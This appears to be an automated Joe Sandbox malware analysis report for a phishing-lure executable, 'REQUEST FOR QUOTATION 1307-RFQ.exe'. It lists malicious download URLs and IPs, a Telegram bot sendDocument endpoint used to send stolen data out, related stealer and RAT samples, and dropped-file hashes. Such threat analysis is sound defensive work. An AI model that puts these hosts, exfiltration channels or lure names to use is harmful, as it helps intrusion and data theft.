                                                                                                                                                                            http://172.234.222.138/asgidloooxieajfarmsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://54.244.188.177/jarmsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://www.autoitscript.com/autoit3/Au3Info_x64.exe.1.drfalse
                                                                                                                                                                                    http://ww99.przvgke.biz/asgidloooxieajf=armsvc.exe, 00000001.00000003.2334989969.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840324999.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://ww99.przvgke.biz/vuoxarmsvc.exe, 00000001.00000003.1878960828.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102437401.0000000000752000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2100645926.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1842899589.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://pcnatrk.net/track.armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://ww99.przvgke.biz/asgidloooxieajfLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedEarmsvc.exe, 00000001.00000003.1878960828.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2100645926.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1842899589.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2334610256.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://54.244.188.177/dyarmsvc.exe, 00000001.00000003.1744244802.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744374270.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://54.244.188.177/qarmsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://ww99.przvgke.biz/asgidloooxieajf.armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://44.221.84.105/narmsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://www.winimage.com/zLibDllarmsvc.exe, 00000001.00000003.1962127671.0000000001F60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://18.141.10.107/ndknjiarmsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://api.telegram.orgRegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://ww99.przvgke.biz/oxarmsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzYwMjZjOWVharmsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://44.221.84.105/un3armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffnotification_click_helper.exe.1.drfalse
                                                                                                                                                                                                                      http://ww12.przvgke.biz/vuox?usid=25&utid=8251791979armsvc.exe, 00000001.00000003.1839091419.0000000000762000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizarmsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834519561.0000000002060000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821644148.0000000002060000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://82.112.184.197/armsvc.exe, armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            172.234.222.143
                                                                                                                                                                                                                            fwiwk.bizUnited States
                                                                                                                                                                                                                            20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            72.52.179.174
                                                                                                                                                                                                                            ww99.przvgke.bizUnited States
                                                                                                                                                                                                                            32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                            158.101.44.242
                                                                                                                                                                                                                            checkip.dyndns.comUnited States
                                                                                                                                                                                                                            31898ORACLE-BMC-31898USfalse
                                                                                                                                                                                                                            172.234.222.138
                                                                                                                                                                                                                            przvgke.bizUnited States
                                                                                                                                                                                                                            20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                            149.154.167.220
                                                                                                                                                                                                                            api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                                                                                                                            76.223.26.96
                                                                                                                                                                                                                            084725.parkingcrew.netUnited States
                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                                            saytjshyf.bizUnited States
                                                                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                                                                            54.244.188.177
                                                                                                                                                                                                                            pywolwnvd.bizUnited States
                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                            13.251.16.150
                                                                                                                                                                                                                            ifsaia.bizUnited States
                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                            47.129.31.212
                                                                                                                                                                                                                            xlfhhhm.bizCanada
                                                                                                                                                                                                                            34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                            82.112.184.197
                                                                                                                                                                                                                            vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                            43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                            18.141.10.107
                                                                                                                                                                                                                            ssbzmoy.bizUnited States
                                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                                            172.67.177.134
                                                                                                                                                                                                                            reallyfreegeoip.orgUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1576074
                                                                                                                                                                                                                            Start date and time:2024-12-16 14:09:26 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 13m 59s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:31
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.rans.spre.troj.spyw.expl.evad.winEXE@20/157@24/13
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 77.8%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63, 20.109.210.53
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Execution Graph export aborted for target RegSvcs.exe, PID 7360 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target armsvc.exe, PID 7316 because there are no executed function
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            08:10:19API Interceptor14x Sleep call for process: armsvc.exe modified
                                                                                                                                                                                                                            08:10:24API Interceptor260828x Sleep call for process: perfhost.exe modified
                                                                                                                                                                                                                            08:10:27API Interceptor598707x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                                                                                            08:10:56API Interceptor199x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            172.234.222.143HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • fwiwk.biz/mepglnjkcg
                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • przvgke.biz/fauopp
                                                                                                                                                                                                                            invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • fwiwk.biz/kbtuvb
                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • fwiwk.biz/lrhpwoxhabbo
                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                            • przvgke.biz/dadmwtnbmefxvi
                                                                                                                                                                                                                            PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • fwiwk.biz/mhwavs
                                                                                                                                                                                                                            IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                            • fwiwk.biz/jwvwqanfys
                                                                                                                                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                            • htwqzczce.biz/qccuqoixlchlyacl
                                                                                                                                                                                                                            AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                            • fwiwk.biz/t
                                                                                                                                                                                                                            E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                            • fwiwk.biz/fvthsigvq
                                                                                                                                                                                                                            72.52.179.174HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • ww99.przvgke.biz/aikqer
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • ww99.przvgke.biz/snsobwmcccpnrm
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • ww99.fwiwk.biz/mepglnjkcg
                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • ww99.przvgke.biz/fauopp
                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • ww99.fwiwk.biz/a
                                                                                                                                                                                                                            8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                            • gatyhub.com/login.php
                                                                                                                                                                                                                            7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                            • gatyhub.com/login.php
                                                                                                                                                                                                                            UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                            • gatyhub.com/login.php
                                                                                                                                                                                                                            1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                            • gatyhub.com/login.php
                                                                                                                                                                                                                            arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                            • gatyhub.com/login.php
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            przvgke.bizRFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 172.234.222.138
                                                                                                                                                                                                                            invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 172.234.222.143
                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 172.234.222.143
                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                            • 172.234.222.143
                                                                                                                                                                                                                            PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 172.234.222.143
                                                                                                                                                                                                                            ssbzmoy.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            Shipment Notification.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            76899.bodis.comHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 199.59.243.227
                                                                                                                                                                                                                            http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                                            http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                                                                                            • 199.59.243.225
                                                                                                                                                                                                                            S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                            • 199.59.243.225
                                                                                                                                                                                                                            xPUqa4qbDL.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 199.59.242.153
                                                                                                                                                                                                                            knjghuig.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 18.141.10.107
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            LIQUIDWEBUSrebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                            • 69.167.175.77
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                                            akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 67.225.207.146
                                                                                                                                                                                                                            xobftuootu.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 67.225.254.236
                                                                                                                                                                                                                            http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                                                                                                                            • 67.227.216.154
                                                                                                                                                                                                                            https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                                            Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                                            AKAMAI-ASN1EUhttps://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 2.16.158.75
                                                                                                                                                                                                                            T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            • 23.209.72.33
                                                                                                                                                                                                                            https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 104.126.36.32
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 204.237.205.123
                                                                                                                                                                                                                            bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 95.100.100.165
                                                                                                                                                                                                                            bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 95.100.100.171
                                                                                                                                                                                                                            bot.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 95.100.100.142
                                                                                                                                                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 2.21.22.15
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                            ORACLE-BMC-31898USref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                            • 193.122.130.0
                                                                                                                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 193.122.130.0
                                                                                                                                                                                                                            PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                            • 158.101.44.242
                                                                                                                                                                                                                            SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                            • 193.122.6.168
                                                                                                                                                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                            • 158.101.44.242
                                                                                                                                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 147.154.242.4
                                                                                                                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                            • 193.122.130.0
                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                            • 193.122.130.0
                                                                                                                                                                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                            • 158.101.44.242
                                                                                                                                                                                                                            elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                            • 140.204.52.53
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1459712
                                                                                                                                                                                                                            Entropy (8bit):5.005742623139484
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:THCAR0iKGJ0eeQ2yPyzc+E7xonyVGc/dT5N:DCAxJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:28FBED9EEB33960368194E3DF7F50644
                                                                                                                                                                                                                            SHA1:96466EA2815E79EB9E2CED2EA6295EDA1E342903
                                                                                                                                                                                                                            SHA-256:8ED753ED672858881E18E5E6CF918A2A3A4762E48AE7CDB07645BA923F7E1513
                                                                                                                                                                                                                            SHA-512:DDD37FC82316DA27F89CA66DA3770EA9D3EA93887E0D4784C95E5FCA0B5F5903883ABBE6C393D0B5749224CFC5B9EC1D3B525CE060A3DBF5F2BE3292C391E6EA
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@..........................P-.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc........p.......f..............@...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1401344
                                                                                                                                                                                                                            Entropy (8bit):4.952367921671459
                                                                                                                                                                                                                            Encrypted:false
